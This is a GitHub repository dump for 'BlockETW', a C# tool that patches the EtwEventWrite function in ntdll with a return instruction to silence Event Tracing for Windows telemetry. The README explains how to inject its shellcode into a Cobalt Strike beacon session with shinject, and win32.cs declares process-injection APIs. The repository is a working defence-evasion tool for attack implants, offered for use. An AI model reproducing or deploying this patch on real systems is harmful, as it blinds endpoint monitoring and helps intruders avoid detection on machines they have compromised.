├── README.md ├── blocketw.bin ├── blocketw.sln └── blocketw ├── App.config ├── Properties └── AssemblyInfo.cs ├── bin └── Release │ ├── blocketw.exe.config │ └── blocketw.pdb ├── blocketw.csproj ├── obj ├── Debug │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ ├── blocketw.csproj.CoreCompileInputs.cache │ ├── blocketw.csproj.FileListAbsolute.txt │ └── blocketw.csprojAssemblyReference.cache └── Release │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ ├── blocketw.csproj.CoreCompileInputs.cache │ ├── blocketw.csproj.FileListAbsolute.txt │ ├── blocketw.csprojAssemblyReference.cache │ ├── blocketw.exe │ └── blocketw.pdb ├── remoteexec.cs └── win32.cs /README.md: -------------------------------------------------------------------------------- 1 | # BlockETW 2 | .Net 3.5 / 4.5 Assembly to block ETW telemetry in a process 3 | 4 | You must "Self-Inject" the blocketw.bin to the session that your beacon lives in 5 | 6 | For injecting into a process: 7 | 8 | > shinject /opt/shellcode/blocketw.bin 9 | 10 | There is no output currently for the command. 11 | It WILL NOT WORK if your using spawnto 12 | 13 | Credits go to RastaMouse and XPN for creating SharpC2 from which this tool is based 14 | and thier research on ETW bypassing. 15 | 16 | Release Build is built with .net 4.5 (but can be built for 3.5) 17 | 18 | https://rastamouse.me/2020/05/sharpc2/ 19 | 20 | https://blog.xpnsec.com/hiding-your-dotnet-etw/ 21 | -------------------------------------------------------------------------------- /blocketw.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Soledge/BlockEtw/c9e906f508d3b34030b78430b20b4c27059a0f95/blocketw.bin -------------------------------------------------------------------------------- /blocketw.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30011.22 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "blocketw", "blocketw\blocketw.csproj", "{DAEDF7B3-8262-4892-ADC4-425DD5F85BCA}" 7 | EndProject 8 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{C5663DE9-FE2B-4AC3-B558-DB5493E2B013}" 9 | EndProject 10 | Global 11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 12 | Debug|Any CPU = Debug|Any CPU 13 | Release|Any CPU = Release|Any CPU 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {DAEDF7B3-8262-4892-ADC4-425DD5F85BCA}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 17 | {DAEDF7B3-8262-4892-ADC4-425DD5F85BCA}.Debug|Any CPU.Build.0 = Debug|Any CPU 18 | {DAEDF7B3-8262-4892-ADC4-425DD5F85BCA}.Release|Any CPU.ActiveCfg = Release|Any CPU 19 | {DAEDF7B3-8262-4892-ADC4-425DD5F85BCA}.Release|Any CPU.Build.0 = Release|Any CPU 20 | EndGlobalSection 21 | GlobalSection(SolutionProperties) = preSolution 22 | HideSolutionNode = FALSE 23 | EndGlobalSection 24 | GlobalSection(ExtensibilityGlobals) = postSolution 25 | SolutionGuid = {8CB560AB-5DA9-459C-9A68-1CFFB9E47644} 26 | EndGlobalSection 27 | EndGlobal 28 | -------------------------------------------------------------------------------- /blocketw/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /blocketw/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("blocketw")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("blocketw")] 13 | [assembly: AssemblyCopyright("Copyright © 2020")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("daedf7b3-8262-4892-adc4-425dd5f85bca")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /blocketw/bin/Release/blocketw.exe.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /blocketw/bin/Release/blocketw.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Soledge/BlockEtw/c9e906f508d3b34030b78430b20b4c27059a0f95/blocketw/bin/Release/blocketw.pdb -------------------------------------------------------------------------------- /blocketw/blocketw.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {DAEDF7B3-8262-4892-ADC4-425DD5F85BCA} 8 | Exe 9 | blocketw 10 | blocketw 11 | v4.5 12 | 512 13 | true 14 | 15 | 16 | AnyCPU 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | AnyCPU 27 | pdbonly 28 | true 29 | bin\Release\ 30 | TRACE 31 | prompt 32 | 4 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /blocketw/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Soledge/BlockEtw/c9e906f508d3b34030b78430b20b4c27059a0f95/blocketw/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /blocketw/obj/Debug/blocketw.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | aae4c9f81314836088327f55a1518e38da65236e 2 | -------------------------------------------------------------------------------- /blocketw/obj/Debug/blocketw.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\Derek.Admin.STANNCENTER\Source\Repos\blocketw\blocketw\obj\Debug\blocketw.csprojAssemblyReference.cache 2 | C:\Users\Derek.Admin.STANNCENTER\Source\Repos\blocketw\blocketw\obj\Debug\blocketw.csproj.CoreCompileInputs.cache 3 | -------------------------------------------------------------------------------- /blocketw/obj/Debug/blocketw.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Soledge/BlockEtw/c9e906f508d3b34030b78430b20b4c27059a0f95/blocketw/obj/Debug/blocketw.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /blocketw/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Soledge/BlockEtw/c9e906f508d3b34030b78430b20b4c27059a0f95/blocketw/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /blocketw/obj/Release/blocketw.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | d2e766d0d31a60a2b8795266bd5415e2f714c314 2 | -------------------------------------------------------------------------------- /blocketw/obj/Release/blocketw.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\Derek.Admin.STANNCENTER\Source\Repos\blocketw\blocketw\bin\Release\blocketw.pdb 2 | C:\Users\Derek.Admin.STANNCENTER\Source\Repos\blocketw\blocketw\obj\Release\blocketw.csprojAssemblyReference.cache 3 | C:\Users\Derek.Admin.STANNCENTER\Source\Repos\blocketw\blocketw\obj\Release\blocketw.csproj.CoreCompileInputs.cache 4 | C:\Users\Derek.Admin.STANNCENTER\Source\Repos\blocketw\blocketw\obj\Release\blocketw.pdb 5 | C:\Users\Derek.Admin.STANNCENTER\Source\Repos\blocketw\blocketw\bin\Release\blocketw.exe.config 6 | C:\Users\Derek.Admin.STANNCENTER\Source\Repos\blocketw\blocketw\bin\Release\blocketw.exe 7 | C:\Users\Derek.Admin.STANNCENTER\Source\Repos\blocketw\blocketw\obj\Release\blocketw.exe 8 | -------------------------------------------------------------------------------- /blocketw/obj/Release/blocketw.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Soledge/BlockEtw/c9e906f508d3b34030b78430b20b4c27059a0f95/blocketw/obj/Release/blocketw.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /blocketw/obj/Release/blocketw.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Soledge/BlockEtw/c9e906f508d3b34030b78430b20b4c27059a0f95/blocketw/obj/Release/blocketw.exe -------------------------------------------------------------------------------- /blocketw/obj/Release/blocketw.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Soledge/BlockEtw/c9e906f508d3b34030b78430b20b4c27059a0f95/blocketw/obj/Release/blocketw.pdb -------------------------------------------------------------------------------- /blocketw/remoteexec.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Diagnostics; 3 | using Agent.PInvoke; 4 | 5 | namespace Agent.Execution 6 | { 7 | internal class RemoteExecution 8 | { 9 | 10 | public static void Main(string[] args) 11 | { 12 | var hProcess = Process.GetCurrentProcess().Handle; 13 | 14 | 15 | var hook = new byte[] { 0xc3 }; 16 | var address = Win32.Kernel32.GetProcAddress(Win32.Kernel32.LoadLibrary("ntdll.dll"), "EtwEventWrite"); 17 | 18 | Win32.Kernel32.VirtualProtectEx(hProcess, address, (UIntPtr)hook.Length, 0x40, out uint oldProtect); 19 | Win32.Kernel32.WriteProcessMemory(hProcess, address, hook, hook.Length, out IntPtr bytesWritten); 20 | Win32.Kernel32.VirtualProtectEx(hProcess, address, (UIntPtr)hook.Length, oldProtect, out uint x); 21 | } 22 | } 23 | } -------------------------------------------------------------------------------- /blocketw/win32.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Text; 3 | using System.Runtime.InteropServices; 4 | 5 | namespace Agent.PInvoke 6 | { 7 | internal class Win32 8 | { 9 | internal class Kernel32 10 | { 11 | [DllImport("kernel32.dll")] 12 | internal static extern bool CreatePipe(out IntPtr hReadPipe, out IntPtr hWritePipe, ref SECURITY_ATTRIBUTES lpPipeAttributes, uint nSize); 13 | 14 | [DllImport("kernel32.dll", SetLastError = true)] 15 | internal static extern bool SetHandleInformation(IntPtr hObject, HANDLE_FLAGS dwMask, HANDLE_FLAGS dwFlags); 16 | 17 | [DllImport("kernel32.dll", SetLastError = true)] 18 | internal static extern bool InitializeProcThreadAttributeList(IntPtr lpAttributeList, int dwAttributeCount, int dwFlags, ref IntPtr lpSize); 19 | 20 | [DllImport("kernel32.dll", SetLastError = true)] 21 | internal static extern bool UpdateProcThreadAttribute(IntPtr lpAttributeList, uint dwFlags, IntPtr Attribute, IntPtr lpValue, IntPtr cbSize, IntPtr lpPreviousValue, IntPtr lpReturnSize); 22 | 23 | [DllImport("kernel32.dll", SetLastError = true)] 24 | internal static extern IntPtr OpenProcess(ProcessAccessFlags processAccess, bool bInheritHandle, int processId); 25 | 26 | [DllImport("kernel32.dll", SetLastError = true)] 27 | [return: MarshalAs(UnmanagedType.Bool)] 28 | internal static extern bool DuplicateHandle(IntPtr hSourceProcessHandle, IntPtr hSourceHandle, IntPtr hTargetProcessHandle, ref IntPtr lpTargetHandle, uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, uint dwOptions); 29 | 30 | [DllImport("kernel32.dll")] 31 | [return: MarshalAs(UnmanagedType.Bool)] 32 | internal static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes, ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFOEX lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation); 33 | 34 | [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] 35 | internal static extern int GetConsoleOutputCP(); 36 | 37 | [DllImport("kernel32.dll", SetLastError = true)] 38 | internal static extern bool PeekNamedPipe(IntPtr handle, IntPtr buffer, IntPtr nBufferSize, IntPtr bytesRead, ref uint bytesAvail, IntPtr BytesLeftThisMessage); 39 | 40 | [DllImport("kernel32.dll", SetLastError = true)] 41 | internal static extern uint WaitForSingleObject(IntPtr handle, uint milliseconds); 42 | 43 | [DllImport("kernel32.dll", SetLastError = true)] 44 | internal static extern bool DeleteProcThreadAttributeList(IntPtr lpAttributeList); 45 | 46 | [DllImport("kernel32.dll", SetLastError = true)] 47 | internal static extern bool CloseHandle(IntPtr hObject); 48 | 49 | [DllImport("kernel32.dll")] 50 | internal static extern void RtlZeroMemory(IntPtr pBuffer, int length); 51 | 52 | [DllImport("kernel32.dll")] 53 | internal static extern Boolean ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, IntPtr lpBuffer, UInt32 dwSize, ref UInt32 lpNumberOfBytesRead); 54 | 55 | [DllImport("kernel32.dll")] 56 | internal static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, int flAllocationType, int flProtect); 57 | 58 | [DllImport("kernel32.dll", SetLastError = true)] 59 | internal static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten); 60 | 61 | [DllImport("kernel32.dll")] 62 | internal static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); 63 | 64 | [DllImport("kernel32.dll", SetLastError = true)] 65 | internal static extern bool QueryFullProcessImageName([In]IntPtr hProcess, [In]int dwFlags, [Out]StringBuilder lpExeName, ref int lpdwSize); 66 | 67 | [DllImport("kernel32.dll")] 68 | internal static extern UInt32 ResumeThread(IntPtr hThread); 69 | 70 | [DllImport("kernel32")] 71 | public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); 72 | 73 | [DllImport("kernel32")] 74 | public static extern IntPtr LoadLibrary(string name); 75 | } 76 | 77 | internal class Ntdll 78 | { 79 | [DllImport("ntdll.dll")] 80 | internal static extern UInt32 NtQueryInformationProcess(IntPtr processHandle, UInt32 processInformationClass, ref ulong processInformation, int processInformationLength, ref UInt32 returnLength); 81 | 82 | [DllImport("ntdll.dll")] 83 | internal static extern UInt32 RtlCreateProcessParametersEx(ref IntPtr pProcessParameters, IntPtr ImagePathName, IntPtr DllPath, IntPtr CurrentDirectory, IntPtr CommandLine, IntPtr Environment, IntPtr WindowTitle, IntPtr DesktopInfo, IntPtr ShellInfo, IntPtr RuntimeData, uint Flags); 84 | 85 | [DllImport("ntdll.dll")] 86 | internal static extern UInt32 NtOpenProcess(ref IntPtr ProcessHandle, UInt32 DesiredAccess, ref OBJECT_ATTRIBUTES ObjectAttributes, ref CLIENT_ID ClientId); 87 | 88 | [DllImport("ntdll.dll")] 89 | internal static extern UInt32 NtCreateSection( 90 | ref IntPtr section, 91 | UInt32 desiredAccess, 92 | IntPtr pAttrs, 93 | ref long MaxSize, 94 | uint pageProt, 95 | uint allocationAttribs, 96 | IntPtr hFile); 97 | 98 | [DllImport("ntdll.dll")] 99 | internal static extern UInt32 NtMapViewOfSection( 100 | IntPtr SectionHandle, 101 | IntPtr ProcessHandle, 102 | ref IntPtr BaseAddress, 103 | IntPtr ZeroBits, 104 | IntPtr CommitSize, 105 | ref long SectionOffset, 106 | ref long ViewSize, 107 | uint InheritDisposition, 108 | uint AllocationType, 109 | uint Win32Protect); 110 | 111 | [DllImport("ntdll.dll")] 112 | internal static extern void RtlInitUnicodeString( 113 | ref UNICODE_STRING DestinationString, 114 | [MarshalAs(UnmanagedType.LPWStr)] 115 | string SourceString); 116 | 117 | [DllImport("ntdll.dll")] 118 | internal static extern UInt32 LdrGetDllHandle( 119 | IntPtr DllPath, 120 | IntPtr DllCharacteristics, 121 | ref UNICODE_STRING DllName, 122 | ref IntPtr DllHandle); 123 | 124 | [DllImport("ntdll.dll")] 125 | internal static extern UInt32 RtlUnicodeStringToAnsiString( 126 | ref ANSI_STRING DestinationString, 127 | ref UNICODE_STRING SourceString, 128 | bool AllocateDestinationString); 129 | 130 | [DllImport("ntdll.dll")] 131 | internal static extern UInt32 LdrGetProcedureAddress( 132 | IntPtr hModule, 133 | ref ANSI_STRING ModName, 134 | UInt32 Ordinal, 135 | ref IntPtr FunctionAddress); 136 | 137 | [DllImport("ntdll.dll")] 138 | internal static extern UInt32 NtCreateThreadEx( 139 | ref IntPtr hThread, 140 | UInt32 DesiredAccess, 141 | IntPtr ObjectAttributes, 142 | IntPtr ProcessHandle, 143 | IntPtr lpStartAddress, 144 | IntPtr lpParameter, 145 | bool CreateSuspended, 146 | UInt32 StackZeroBits, 147 | UInt32 SizeOfStackCommit, 148 | UInt32 SizeOfStackReserve, 149 | IntPtr lpBytesBuffer); 150 | 151 | [DllImport("ntdll.dll")] 152 | internal static extern UInt32 NtQueueApcThread( 153 | IntPtr ThreadHandle, 154 | IntPtr ApcRoutine, 155 | IntPtr ApcArgument1, 156 | IntPtr ApcArgument2, 157 | IntPtr ApcArgument3); 158 | 159 | [DllImport("ntdll.dll")] 160 | internal static extern UInt32 NtAlertResumeThread( 161 | IntPtr ThreadHandle, 162 | ref UInt32 PreviousSuspendCount); 163 | 164 | [DllImport("ntdll.dll")] 165 | internal static extern UInt32 NtQueryInformationThread( 166 | IntPtr ThreadHandle, 167 | int ThreadInformationClass, 168 | IntPtr ThreadInformation, 169 | int ThreadInformationLength, 170 | ref int ReturnLength); 171 | 172 | [DllImport("ntdll.dll")] 173 | public static extern UInt32 NtUnmapViewOfSection( 174 | IntPtr ProcessHandle, 175 | IntPtr BaseAddress); 176 | } 177 | 178 | [StructLayout(LayoutKind.Sequential)] 179 | internal struct PROCESS_INFORMATION 180 | { 181 | internal IntPtr hProcess; 182 | internal IntPtr hThread; 183 | internal int dwProcessId; 184 | internal int dwThreadId; 185 | } 186 | 187 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 188 | internal struct STARTUPINFO 189 | { 190 | internal Int32 cb; 191 | internal string lpReserved; 192 | internal string lpDesktop; 193 | internal string lpTitle; 194 | internal Int32 dwX; 195 | internal Int32 dwY; 196 | internal Int32 dwXSize; 197 | internal Int32 dwYSize; 198 | internal Int32 dwXCountChars; 199 | internal Int32 dwYCountChars; 200 | internal Int32 dwFillAttribute; 201 | internal Int32 dwFlags; 202 | internal Int16 wShowWindow; 203 | internal Int16 cbReserved2; 204 | internal IntPtr lpReserved2; 205 | internal IntPtr hStdInput; 206 | internal IntPtr hStdOutput; 207 | internal IntPtr hStdError; 208 | } 209 | 210 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 211 | internal struct STARTUPINFOEX 212 | { 213 | internal STARTUPINFO StartupInfo; 214 | internal IntPtr lpAttributeList; 215 | } 216 | 217 | [StructLayout(LayoutKind.Sequential)] 218 | internal struct SECURITY_ATTRIBUTES 219 | { 220 | internal int nLength; 221 | internal IntPtr lpSecurityDescriptor; 222 | [MarshalAs(UnmanagedType.Bool)] 223 | internal bool bInheritHandle; 224 | } 225 | 226 | [StructLayout(LayoutKind.Sequential)] 227 | internal struct PROCESS_BASIC_INFORMATION 228 | { 229 | internal IntPtr ExitStatus; 230 | internal IntPtr PebBaseAddress; 231 | internal IntPtr AffinityMask; 232 | internal IntPtr BasePriority; 233 | internal UIntPtr UniqueProcessId; 234 | internal IntPtr InheritedFromUniqueProcessId; 235 | } 236 | 237 | [StructLayout(LayoutKind.Sequential)] 238 | internal class THREAD_BASIC_INFORMATION 239 | { 240 | internal UInt32 ExitStatus; 241 | internal IntPtr TebBaseAddress; 242 | internal CLIENT_ID ClientId; 243 | internal UIntPtr AffinityMask; 244 | internal int Priority; 245 | internal int BasePriority; 246 | } 247 | 248 | [StructLayout(LayoutKind.Sequential)] 249 | internal struct UNICODE_STRING 250 | { 251 | internal UInt16 Length; 252 | internal UInt16 MaximumLength; 253 | internal IntPtr Buffer; 254 | } 255 | 256 | [StructLayout(LayoutKind.Sequential)] 257 | internal struct ANSI_STRING 258 | { 259 | internal UInt16 Length; 260 | internal UInt16 MaximumLength; 261 | internal IntPtr Buffer; 262 | } 263 | 264 | [StructLayout(LayoutKind.Sequential, Pack = 0)] 265 | internal struct OBJECT_ATTRIBUTES 266 | { 267 | internal Int32 Length; 268 | internal IntPtr RootDirectory; 269 | internal IntPtr ObjectName; 270 | internal uint Attributes; 271 | internal IntPtr SecurityDescriptor; 272 | internal IntPtr SecurityQualityOfService; 273 | } 274 | 275 | [StructLayout(LayoutKind.Sequential)] 276 | internal struct CLIENT_ID 277 | { 278 | internal IntPtr UniqueProcess; 279 | internal IntPtr UniqueThread; 280 | } 281 | 282 | [Flags] 283 | internal enum ProcessAccessFlags : uint 284 | { 285 | All = 0x001F0FFF, 286 | Terminate = 0x00000001, 287 | CreateThread = 0x00000002, 288 | VirtualMemoryOperation = 0x00000008, 289 | VirtualMemoryRead = 0x00000010, 290 | VirtualMemoryWrite = 0x00000020, 291 | DuplicateHandle = 0x00000040, 292 | CreateProcess = 0x000000080, 293 | SetQuota = 0x00000100, 294 | SetInformation = 0x00000200, 295 | QueryInformation = 0x00000400, 296 | QueryLimitedInformation = 0x00001000, 297 | Synchronize = 0x00100000 298 | } 299 | 300 | [Flags] 301 | internal enum HANDLE_FLAGS : uint 302 | { 303 | None = 0, 304 | INHERIT = 1, 305 | PROTECT_FROM_CLOSE = 2 306 | } 307 | 308 | [Flags] 309 | internal enum DuplicateOptions : uint 310 | { 311 | DUPLICATE_CLOSE_SOURCE = 0x00000001, 312 | DUPLICATE_SAME_ACCESS = 0x00000002 313 | } 314 | 315 | [Flags] 316 | internal enum AllocationProtect : uint 317 | { 318 | NONE = 0x00000000, 319 | PAGE_EXECUTE = 0x00000010, 320 | PAGE_EXECUTE_READ = 0x00000020, 321 | PAGE_EXECUTE_READWRITE = 0x00000040, 322 | PAGE_EXECUTE_WRITECOPY = 0x00000080, 323 | PAGE_NOACCESS = 0x00000001, 324 | PAGE_READONLY = 0x00000002, 325 | PAGE_READWRITE = 0x00000004, 326 | PAGE_WRITECOPY = 0x00000008, 327 | PAGE_GUARD = 0x00000100, 328 | PAGE_NOCACHE = 0x00000200, 329 | PAGE_WRITECOMBINE = 0x00000400 330 | } 331 | } 332 | } --------------------------------------------------------------------------------